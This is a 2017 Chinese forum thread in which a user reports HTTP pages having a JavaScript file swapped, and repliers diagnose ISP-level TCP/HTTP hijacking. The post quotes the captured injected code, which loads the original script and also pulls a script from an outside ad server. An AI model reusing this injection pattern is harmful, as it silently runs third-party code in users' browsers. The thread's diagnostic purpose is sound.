这是一个创建于 2362 天前的主题,其中的信息可能已经有所发展或是发生改变。
打开若干个 http 的网站会出现某一个 js 被替换,变成类似于这样的代码:
var _atn_obj_ = new Object;
_atn_obj_.oldurl = 'http://lxbjs.baidu.com/newFloat/_l.js?siteid=11111111&bdclickid=&bdcbid=57adfa92-3452-413a-8587-6752de90f6fb&refer_domain=&ishttp=1&t=1509335407566&callback=_lxb_jsonp_j9dnbxzi_&cHVzaA=1509335497';
_atn_obj_.unified_url = 'http://kio.quanliyouxi.cn:2525/ad_unified_access?SP=ABys7Pg8zJysfJzczOzMqgzs7NycuDqN+xq87P0c/R0oPOg8vLz8zPz4POg87Kz8bMzMrLxsiDzsrPxszMysvGyM/JxsnJy8aDzs7Jzso=';
window.setTimeout(function() {
var a = document.createElement("script");
a.src = _atn_obj_.oldurl;
document.getElementsByTagName("head")[0].appendChild(a);
}, 0);
window.setTimeout(function() {
var a = document.createElement("script");
a.src = _atn_obj_.unified_url;
document.getElementsByTagName("head")[0].appendChild(a);
}, 0);
oldurl 是原来某个 js 的 url 地址。
测试了多个网站,均有出现某个 js 被篡改。 https 站点则没有这个情况。
 |
1
miyuki 2017-10-30 12:08:36 +08:00 via Android
如果排除本地恶意插件、病毒的话,是劫持,但方式不一定是 DNS,现在多数都是嗅探 TCP 劫持了
|
 |
2
yexm0 2017-10-30 12:17:52 +08:00 via iPhone
同意,这是 tcp 劫持了。
|
 |
3
cye3s 2017-10-30 12:18:29 +08:00 via Android
http 劫持
|
 |
4
G900 2017-11-09 21:53:11 +08:00
我这也是,拦截 CDN 的 jquery 文件,插入广告代码,这个垃圾 quanliyouxi.cn 域名。
公司名是「韶关市启慧信息技术有限公司」,韶关市启慧信息技术有限公司,韶关市 启慧 信息技术 有限公司 插入垃圾代码,电信广告,电信劫持,垃圾广告 |
 |
5
crist 2017-12-11 10:00:31 +08:00
我也出现这个问题了,怎么办?
|
Select Language